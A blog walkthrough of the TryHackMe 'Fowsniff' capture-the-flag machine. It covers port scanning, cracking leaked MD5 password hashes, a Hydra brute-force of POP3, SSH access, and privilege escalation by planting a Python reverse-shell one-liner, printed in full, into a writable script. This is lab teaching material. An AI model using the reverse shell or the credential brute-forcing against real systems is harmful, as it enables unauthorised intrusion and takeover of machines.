TryHackMe Walkthrough | Fowsniff

Aditya Kumar
4 min readJun 28, 2021

--

A beginner-friendly CTF challenge

This machine is brilliant for new starters. You will have to enumerate this machine by finding open ports, do some online research (its amazing how much information Google can find for you), decoding hashes, brute forcing a pop3 login and much more!

Lets get started.

Prerequisites

Before deploying the machine make sure you have you VPN ready.

Now deploy the machine after the VPN is ready.

Reconnaissance

I started by gathering some information and checking what all ports are open by doing a basic nmap scan.

Port 80 is open so there must be a webpage and we also some other services on port 110 and 143 which might be interesting.

Checking the webpage

On the webpage, we can see a Twitter account username

This Twitter account had a Pastebin link for leaked password and usernames.

We get a list of passwords that are MD5 encrypted.

We got the credentials of the user’s email here it is in md5 hashes will try to decrypt it using an online search hashkiller was provided by THM to convert the md5 hashes.

As pop3 is available we can use these credentials to brute force the login. we will save all the user names in user.txt and all the decrypted passwords in pass.txt.

Brute-Forcing

I used Hydra.

hydra -L users.txt -P passw.txt pop3://<IP>

And we found the password.

Connecting to the pop3 service using netcat.

nc <Target_ ip> <port of pop3 service>

Here we have 2 messages, information for the flags is hidden in them.

retr 1

Found the password for SSH login.

retr 2

Found the username as well for the SSH login.

SSH

Using these credentials to log in via SSH.

Finding the files with user execution permissions.

find / -group users -type f 2>/dev/null

Our main focus is /opt/cube/cube.sh

Editing the cube.sh file and writing our reverse shell payload into it.

python3 -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“<IP>”,1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’

Executing the cube.sh file and we get a reverse shell

We got a reverse shell through NetCat.

And we found our root flag.

Thanks for reading If you found this helpful please do leave a clap.

--

--

Aditya Kumar

B.Sc IT Graduate with C.E.H certification currently pursuing Offensive Security (Red Team). Passion for MMA and Kick-boxing & Automobile Enthusiast.